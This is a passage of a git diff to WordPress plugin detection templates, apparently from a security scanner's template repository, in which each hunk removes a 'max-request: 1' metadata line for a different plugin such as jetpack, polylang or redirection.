     wpscan: https://wpscan.com/plugin/happy-elementor-addons
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
index dbea07a6da..da63d1cbf6 100644
--- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer-code-manager/
   metadata:
-    max-request: 1
     plugin_namespace: header-footer-code-manager
     wpscan: https://wpscan.com/plugin/header-footer-code-manager
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
index 17a8f220cf..f94e7f6494 100644
--- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer-elementor/
   metadata:
-    max-request: 1
     plugin_namespace: header-footer-elementor
     wpscan: https://wpscan.com/plugin/header-footer-elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml
index 956a08b32d..95d2aa5f16 100644
--- a/http/technologies/wordpress/plugins/header-footer.yaml
+++ b/http/technologies/wordpress/plugins/header-footer.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer/
   metadata:
-    max-request: 1
     plugin_namespace: header-footer
     wpscan: https://wpscan.com/plugin/header-footer
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml
index 5a570b9077..af8193b875 100644
--- a/http/technologies/wordpress/plugins/health-check.yaml
+++ b/http/technologies/wordpress/plugins/health-check.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/health-check/
   metadata:
-    max-request: 1
     plugin_namespace: health-check
     wpscan: https://wpscan.com/plugin/health-check
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml
index 4ecac0cd92..8d7e45818b 100644
--- a/http/technologies/wordpress/plugins/hello-dolly.yaml
+++ b/http/technologies/wordpress/plugins/hello-dolly.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/hello-dolly/
   metadata:
-    max-request: 1
     plugin_namespace: hello-dolly
     wpscan: https://wpscan.com/plugin/hello-dolly
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
index e50f58cef8..ed3967db7b 100644
--- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml
+++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/host-webfonts-local/
   metadata:
-    max-request: 1
     plugin_namespace: host-webfonts-local
     wpscan: https://wpscan.com/plugin/host-webfonts-local
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml
index 031bb48563..2ff5adba86 100644
--- a/http/technologies/wordpress/plugins/imagify.yaml
+++ b/http/technologies/wordpress/plugins/imagify.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/imagify/
   metadata:
-    max-request: 1
     plugin_namespace: imagify
     wpscan: https://wpscan.com/plugin/imagify
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml
index 3cdcf3da93..9099f3c0a5 100644
--- a/http/technologies/wordpress/plugins/imsanity.yaml
+++ b/http/technologies/wordpress/plugins/imsanity.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/imsanity/
   metadata:
-    max-request: 1
     plugin_namespace: imsanity
     wpscan: https://wpscan.com/plugin/imsanity
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
index c222bc9d4a..1ee0e67542 100644
--- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
+++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/insert-headers-and-footers/
   metadata:
-    max-request: 1
     plugin_namespace: insert-headers-and-footers
     wpscan: https://wpscan.com/plugin/insert-headers-and-footers
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml
index 9c6e3e6d2e..1778552d75 100644
--- a/http/technologies/wordpress/plugins/instagram-feed.yaml
+++ b/http/technologies/wordpress/plugins/instagram-feed.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/instagram-feed/
   metadata:
-    max-request: 1
     plugin_namespace: instagram-feed
     wpscan: https://wpscan.com/plugin/instagram-feed
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
index 66b7d6a363..7ba81036cf 100644
--- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/intuitive-custom-post-order/
   metadata:
-    max-request: 1
     plugin_namespace: intuitive-custom-post-order
     wpscan: https://wpscan.com/plugin/intuitive-custom-post-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml
index a36016562d..24fc3e3295 100644
--- a/http/technologies/wordpress/plugins/iwp-client.yaml
+++ b/http/technologies/wordpress/plugins/iwp-client.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/iwp-client/
   metadata:
-    max-request: 1
     plugin_namespace: iwp-client
     wpscan: https://wpscan.com/plugin/iwp-client
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml
index 8033aacbc6..3e89505574 100644
--- a/http/technologies/wordpress/plugins/jetpack-boost.yaml
+++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/jetpack-boost/
   metadata:
-    max-request: 1
     plugin_namespace: jetpack-boost
     wpscan: https://wpscan.com/plugin/jetpack-boost
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml
index e4017b1a0a..e701e365ba 100644
--- a/http/technologies/wordpress/plugins/jetpack.yaml
+++ b/http/technologies/wordpress/plugins/jetpack.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/jetpack/
   metadata:
-    max-request: 1
     plugin_namespace: jetpack
     wpscan: https://wpscan.com/plugin/jetpack
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml
index 53d6d393bd..c0cc5400a8 100644
--- a/http/technologies/wordpress/plugins/kadence-blocks.yaml
+++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/kadence-blocks/
   metadata:
-    max-request: 1
     plugin_namespace: kadence-blocks
     wpscan: https://wpscan.com/plugin/kadence-blocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml
index c286e9a14f..22687bcffe 100644
--- a/http/technologies/wordpress/plugins/kirki.yaml
+++ b/http/technologies/wordpress/plugins/kirki.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/kirki/
   metadata:
-    max-request: 1
     plugin_namespace: kirki
     wpscan: https://wpscan.com/plugin/kirki
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml
index 364e3cd71e..b69d3d5bfe 100644
--- a/http/technologies/wordpress/plugins/leadin.yaml
+++ b/http/technologies/wordpress/plugins/leadin.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/leadin/
   metadata:
-    max-request: 1
     plugin_namespace: leadin
     wpscan: https://wpscan.com/plugin/leadin
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
index 4fcccbfc33..7975a57702 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/limit-login-attempts-reloaded/
   metadata:
-    max-request: 1
     plugin_namespace: limit-login-attempts-reloaded
     wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
index 3fbc714d3b..ff4cef94d7 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/limit-login-attempts/
   metadata:
-    max-request: 1
     plugin_namespace: limit-login-attempts
     wpscan: https://wpscan.com/plugin/limit-login-attempts
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml
index c49b506979..a8903697b0 100644
--- a/http/technologies/wordpress/plugins/litespeed-cache.yaml
+++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/litespeed-cache/
   metadata:
-    max-request: 1
     plugin_namespace: litespeed-cache
     wpscan: https://wpscan.com/plugin/litespeed-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml
index dfcaf6f71b..3f141c4476 100644
--- a/http/technologies/wordpress/plugins/loco-translate.yaml
+++ b/http/technologies/wordpress/plugins/loco-translate.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/loco-translate/
   metadata:
-    max-request: 1
     plugin_namespace: loco-translate
     wpscan: https://wpscan.com/plugin/loco-translate
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml
index 61be246fee..5355e988a2 100644
--- a/http/technologies/wordpress/plugins/loginizer.yaml
+++ b/http/technologies/wordpress/plugins/loginizer.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/loginizer/
   metadata:
-    max-request: 1
     plugin_namespace: loginizer
     wpscan: https://wpscan.com/plugin/loginizer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
index 50d2e6630b..53d409fb68 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/mailchimp-for-woocommerce/
   metadata:
-    max-request: 1
     plugin_namespace: mailchimp-for-woocommerce
     wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
index 8d71f7bde9..0e908a9580 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/mailchimp-for-wp/
   metadata:
-    max-request: 1
     plugin_namespace: mailchimp-for-wp
     wpscan: https://wpscan.com/plugin/mailchimp-for-wp
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml
index 5e1f97086e..aeb1875c57 100644
--- a/http/technologies/wordpress/plugins/mailpoet.yaml
+++ b/http/technologies/wordpress/plugins/mailpoet.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/mailpoet/
   metadata:
-    max-request: 1
     plugin_namespace: mailpoet
     wpscan: https://wpscan.com/plugin/mailpoet
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml
index d87d456a8c..7c15702305 100644
--- a/http/technologies/wordpress/plugins/maintenance.yaml
+++ b/http/technologies/wordpress/plugins/maintenance.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/maintenance/
   metadata:
-    max-request: 1
     plugin_namespace: maintenance
     wpscan: https://wpscan.com/plugin/maintenance
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml
index aa9153241e..5ce87e6c71 100644
--- a/http/technologies/wordpress/plugins/mainwp-child.yaml
+++ b/http/technologies/wordpress/plugins/mainwp-child.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/mainwp-child/
   metadata:
-    max-request: 1
     plugin_namespace: mainwp-child
     wpscan: https://wpscan.com/plugin/mainwp-child
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml
index 09641796a3..c342e6b45a 100644
--- a/http/technologies/wordpress/plugins/malcare-security.yaml
+++ b/http/technologies/wordpress/plugins/malcare-security.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/malcare-security/
   metadata:
-    max-request: 1
     plugin_namespace: malcare-security
     wpscan: https://wpscan.com/plugin/malcare-security
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml
index 28b70d09bf..e95041f555 100644
--- a/http/technologies/wordpress/plugins/megamenu.yaml
+++ b/http/technologies/wordpress/plugins/megamenu.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/megamenu/
   metadata:
-    max-request: 1
     plugin_namespace: megamenu
     wpscan: https://wpscan.com/plugin/megamenu
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml
index b43c10ed7a..879a0d1c12 100644
--- a/http/technologies/wordpress/plugins/members.yaml
+++ b/http/technologies/wordpress/plugins/members.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/members/
   metadata:
-    max-request: 1
     plugin_namespace: members
     wpscan: https://wpscan.com/plugin/members
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml
index eb7e78bc7f..985f5d373a 100644
--- a/http/technologies/wordpress/plugins/meta-box.yaml
+++ b/http/technologies/wordpress/plugins/meta-box.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/meta-box/
   metadata:
-    max-request: 1
     plugin_namespace: meta-box
     wpscan: https://wpscan.com/plugin/meta-box
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml
index 3da2ea50e1..bbc305b8de 100644
--- a/http/technologies/wordpress/plugins/ml-slider.yaml
+++ b/http/technologies/wordpress/plugins/ml-slider.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ml-slider/
   metadata:
-    max-request: 1
     plugin_namespace: ml-slider
     wpscan: https://wpscan.com/plugin/ml-slider
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml
index 7a58c58f63..7e3e4e2d7e 100644
--- a/http/technologies/wordpress/plugins/newsletter.yaml
+++ b/http/technologies/wordpress/plugins/newsletter.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/newsletter/
   metadata:
-    max-request: 1
     plugin_namespace: newsletter
     wpscan: https://wpscan.com/plugin/newsletter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
index 5f99b8cac8..17ea142c46 100644
--- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
+++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/nextend-facebook-connect/
   metadata:
-    max-request: 1
     plugin_namespace: nextend-facebook-connect
     wpscan: https://wpscan.com/plugin/nextend-facebook-connect
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
index b08876df04..953e4ab3d8 100644
--- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml
+++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/nextgen-gallery/
   metadata:
-    max-request: 1
     plugin_namespace: nextgen-gallery
     wpscan: https://wpscan.com/plugin/nextgen-gallery
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml
index 3f68dffe06..92107fa69c 100644
--- a/http/technologies/wordpress/plugins/ninja-forms.yaml
+++ b/http/technologies/wordpress/plugins/ninja-forms.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ninja-forms/
   metadata:
-    max-request: 1
     plugin_namespace: ninja-forms
     wpscan: https://wpscan.com/plugin/ninja-forms
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml
index 34f9bde1d6..5e1fe4ef5c 100644
--- a/http/technologies/wordpress/plugins/ocean-extra.yaml
+++ b/http/technologies/wordpress/plugins/ocean-extra.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ocean-extra/
   metadata:
-    max-request: 1
     plugin_namespace: ocean-extra
     wpscan: https://wpscan.com/plugin/ocean-extra
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
index d9f645328f..74fb3e6010 100644
--- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
+++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/official-facebook-pixel/
   metadata:
-    max-request: 1
     plugin_namespace: official-facebook-pixel
     wpscan: https://wpscan.com/plugin/official-facebook-pixel
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
index 8a1196fc9f..b9f70ba555 100644
--- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml
+++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/one-click-demo-import/
   metadata:
-    max-request: 1
     plugin_namespace: one-click-demo-import
     wpscan: https://wpscan.com/plugin/one-click-demo-import
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml
index 05025452b7..6486c02c9a 100644
--- a/http/technologies/wordpress/plugins/optinmonster.yaml
+++ b/http/technologies/wordpress/plugins/optinmonster.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/optinmonster/
   metadata:
-    max-request: 1
     plugin_namespace: optinmonster
     wpscan: https://wpscan.com/plugin/optinmonster
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml
index 1db1b57708..81f58198d3 100644
--- a/http/technologies/wordpress/plugins/otter-blocks.yaml
+++ b/http/technologies/wordpress/plugins/otter-blocks.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/otter-blocks/
   metadata:
-    max-request: 1
     plugin_namespace: otter-blocks
     wpscan: https://wpscan.com/plugin/otter-blocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml
index dafe6974f6..3743307dbc 100644
--- a/http/technologies/wordpress/plugins/password-protected.yaml
+++ b/http/technologies/wordpress/plugins/password-protected.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/password-protected/
   metadata:
-    max-request: 1
     plugin_namespace: password-protected
     wpscan: https://wpscan.com/plugin/password-protected
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml
index ba05fb1e16..a4c6980041 100644
--- a/http/technologies/wordpress/plugins/pdf-embedder.yaml
+++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/pdf-embedder/
   metadata:
-    max-request: 1
     plugin_namespace: pdf-embedder
     wpscan: https://wpscan.com/plugin/pdf-embedder
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
index a038adac53..e085f30e5a 100644
--- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/pinterest-for-woocommerce/
   metadata:
-    max-request: 1
     plugin_namespace: pinterest-for-woocommerce
     wpscan: https://wpscan.com/plugin/pinterest-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml
index 7f98d822a8..adf3387ddb 100644
--- a/http/technologies/wordpress/plugins/pixelyoursite.yaml
+++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/pixelyoursite/
   metadata:
-    max-request: 1
     plugin_namespace: pixelyoursite
     wpscan: https://wpscan.com/plugin/pixelyoursite
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml
index 89602f4264..eb6e1aaa5d 100644
--- a/http/technologies/wordpress/plugins/polylang.yaml
+++ b/http/technologies/wordpress/plugins/polylang.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/polylang/
   metadata:
-    max-request: 1
     plugin_namespace: polylang
     wpscan: https://wpscan.com/plugin/polylang
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml
index 2f6513ca42..b3c83cd0bf 100644
--- a/http/technologies/wordpress/plugins/popup-builder.yaml
+++ b/http/technologies/wordpress/plugins/popup-builder.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/popup-builder/
   metadata:
-    max-request: 1
     plugin_namespace: popup-builder
     wpscan: https://wpscan.com/plugin/popup-builder
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml
index 982306b13c..96d8bd6aca 100644
--- a/http/technologies/wordpress/plugins/popup-maker.yaml
+++ b/http/technologies/wordpress/plugins/popup-maker.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/popup-maker/
   metadata:
-    max-request: 1
     plugin_namespace: popup-maker
     wpscan: https://wpscan.com/plugin/popup-maker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml
index fdcac13b56..85955ac95e 100644
--- a/http/technologies/wordpress/plugins/post-smtp.yaml
+++ b/http/technologies/wordpress/plugins/post-smtp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/post-smtp/
   metadata:
-    max-request: 1
     plugin_namespace: post-smtp
     wpscan: https://wpscan.com/plugin/post-smtp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml
index fc316f9f7a..a81fc892ca 100644
--- a/http/technologies/wordpress/plugins/post-types-order.yaml
+++ b/http/technologies/wordpress/plugins/post-types-order.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/post-types-order/
   metadata:
-    max-request: 1
     plugin_namespace: post-types-order
     wpscan: https://wpscan.com/plugin/post-types-order
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
index 975b63f5de..d9c6052cd7 100644
--- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
+++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/premium-addons-for-elementor/
   metadata:
-    max-request: 1
     plugin_namespace: premium-addons-for-elementor
     wpscan: https://wpscan.com/plugin/premium-addons-for-elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml
index 5065659e82..afc1141e0c 100644
--- a/http/technologies/wordpress/plugins/pretty-link.yaml
+++ b/http/technologies/wordpress/plugins/pretty-link.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/pretty-link/
   metadata:
-    max-request: 1
     plugin_namespace: pretty-link
     wpscan: https://wpscan.com/plugin/pretty-link
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
index 732ffbc4eb..d44add9ca6 100644
--- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/really-simple-captcha/
   metadata:
-    max-request: 1
     plugin_namespace: really-simple-captcha
     wpscan: https://wpscan.com/plugin/really-simple-captcha
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
index 12dffeb534..20ba5c2e16 100644
--- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/really-simple-ssl/
   metadata:
-    max-request: 1
     plugin_namespace: really-simple-ssl
     wpscan: https://wpscan.com/plugin/really-simple-ssl
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml
index ae0e76c4bb..cbcf3cf09d 100644
--- a/http/technologies/wordpress/plugins/redirection.yaml
+++ b/http/technologies/wordpress/plugins/redirection.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/redirection/
   metadata:
-    max-request: 1
     plugin_namespace: redirection
     wpscan: https://wpscan.com/plugin/redirection
   tags: tech,wordpress,wp-plugin,top-100,top-200
